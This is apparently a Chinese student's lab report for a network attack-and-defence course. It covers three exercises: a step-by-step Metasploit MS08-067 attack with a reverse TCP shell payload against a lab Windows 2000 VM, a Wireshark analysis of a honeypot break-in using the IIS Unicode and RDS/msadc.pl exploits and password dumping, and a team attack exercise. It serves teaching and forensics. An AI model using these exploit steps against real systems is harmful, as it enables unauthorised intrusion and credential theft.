本文介绍了使用Metasploit进行Windows远程渗透攻击的实践,包括针对MS08-067漏洞的攻击和蜜罐主机的取证分析。攻击者利用了NT系统漏洞并借助特定工具获取系统访问权。此外,还讨论了防止此类攻击的措施,如复杂口令和漏洞修复。文章还涉及团队对抗中的Windows系统远程渗透攻击模拟。
20222937 2022-2023-4 《网络攻防实践》第六周作业
1.实践内容
(1)动手实践Metasploit windows attacker
任务:使用metasploit软件进行windows远程渗透统计实验
具体任务内容:使用windows Attacker/BT4攻击机尝试对windows Metasploitable靶机上的MS08-067漏洞进行远程渗透攻击,获取目标主机的访问权
(2)取证分析实践:解码一次成功的NT系统破解攻击。
来自212.116.251.162的攻击者成功攻陷了一台由rfp部署的蜜罐主机172.16.1.106,(主机名为lab.wiretrip.net),要求提取并分析攻击的全部过程。
攻击者使用了什么破解工具进行攻击
攻击者如何使用这个破解工具进入并控制了系统
攻击者获得系统访问权限后做了什么
我们如何防止这样的攻击
你觉得攻击者是否警觉了他的目标是一台蜜罐主机?如果是,为什么
(3)团队对抗实践:windows系统远程渗透攻击和分析。
攻方使用metasploit选择漏洞进行攻击,获得控制权。(要求写出攻击方的同学信息、使用漏洞、相关IP地址等)
防守方使用wireshark监听获得的网络数据包,分析攻击过程,获取相关信息。
2.实践过程
2.1 动手实践Metasploit windows attacker
设备 IP地址
| 主机 | IP地址 |
|---|---|
| Kali(攻击机) | 192.168.200.4 |
| Win2k (靶机) | 192.168.200.125 |
在Kali虚拟机中启动Metasploit
service postgresql start //启动PostgreSQL服务
msfdb init //初始化Metasploit PostgreSQL数据库
msfconsole //启动metasploit
使用命令search ms08_067搜寻漏洞情况
使用命令use windows/smb/ms08_067_netapi表明将ms08_067作为目标漏洞
使用命令show payloads查看有效的攻击载荷
使用命令set payload generic/shell_reverse_tcp设置攻击的载荷为tcp的反向连接
使用命令show options查看需要设置的参数,即攻击机与靶机的IP地址。
使用命令set LHOST 192.168.200.4设置攻击机Kali;
使用命令set RHOST 192.168.200.125设置靶机Win2k
使用命令show targets查看可设置的操作系统类型
使用命令set TARGET 0表示自动识别。
输入命令exploit开始渗透,输入ipconfig可以查看靶机自己的IP地址,攻击成功
2.2 取证分析实践:解码一次成功的NT系统破解攻击
来自212.116.251.162的攻击者成功攻陷了一台由rfp部署的蜜罐主机172.16.1.106,(主机名为lab.wiretrip.net),要求提取并分析攻击的全部过程。
用Wireshark打开二进制文件,通过"ip.addr == 213.116.251.162 && ip.addr == 172.16.1.106"对数据包进行过滤,可以看到攻击机与靶机在TCP"三次握手"后建立了连接,同时发现靶机的操作系统为windows NT 5.0,攻击机还访问了http://lab.wiretrip.net/Default.htm。
可以从追踪的包中找到包含/…%C0%AF…/的字符,说明攻击者利用了IIS Unicode漏洞进行了攻击。
追踪第149号数据流,可以看到出现了类似于shell(“cmd /c echo”)的字符,说明攻击者通过shell指令对目标进行操作,进一步分析得知,还利用了RDS漏洞允许任意代码执行的缺陷进行了操作。
攻击者使用了什么破解工具进行攻击?
上述指令均采用了Microsoft Access Driver (*.mdb)的驱动,使用了c:\winnt\help\iis\htm\tutorial\btcustmr.mdb这个dbq文件。根据ADM!ROX!YOUR!WORLD这个特征字符串,查询得知攻击者应该是利用了由rain forest puppy所编写的 msadc(2).pl渗透攻击代码发起的攻击。
攻击者如何使用这个破解工具进入并控制了系统?
观察发现,每一次的攻击时间都很短,可见攻击者应该是先将指令写入了shell脚本,然后将这个脚本与msadc.pl攻击脚本一起执行的。
由上面的第一段shell命令可以看出,攻击者打开主机后,使用FTP的方式下载文件,使用samdunp拿到口令,再利用pdump.exe破解。在第四次破解,也就是打开IP地址为213.116.251.162的主机后,攻击者成功拿到了访问权限。
攻击者获得系统访问权限后做了什么?
攻击者获得了IWAM_KENNY和IUSR_KENNY的账号,并试图获取本地Administrator用户权限。
为此,攻击者将破解的口令写入了yay.txt中,将用户写入到hec.txt文件中。还试图删除和拷贝har.txt文件。
我们如何防止这样的攻击?
1.设置复杂的口令并定期更换,加大口令被破译的难度。
2.设备要定期检测以及修复漏洞,及时安装补丁。
你觉得攻击者是否警觉了他的目标是一台蜜罐主机?如果是,为什么?
追踪174号TCP流tcp.stream eq 174,发现攻击者发送了这样一段命令,可以看出攻击者知道是蜜罐主机了
2.3 团队对抗实践:windows系统远程渗透攻击和分析
在进行这部分实验时用到的攻击机和靶机IP地址:
| 主机 | IP地址 |
|---|---|
| 攻击机 | 192.168.200.4 |
| 靶机 | 192.168.200.6 |
将ms08_067作为漏洞进行攻击。
执行指令net user:
3.实践过程
- 问题:第一次实验时设置攻击机与靶机地址使用命令错误,导致配置失败
- 问题解决方案:区分命令设置的地址:set LHOST设置的是攻击主机的地址;set RHOST设置的是靶机的地址。
4.学习感悟、思考等)
随着网络攻击和防御技术的日益演进,新型的网络攻击方式层出不穷,给网络安全带来了极大的挑战。我们在使用操作系统时,一定要及时更新安全补丁,以及时防御对手的攻击。
通过本次实践对Windows的攻防有了基本的了解,能够进行一些简单的漏洞攻击,但对于一些原理上的内容还是理解的不够透彻。很多分析还比较浅显,还是要多寻找相关资料进行学习。
272
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
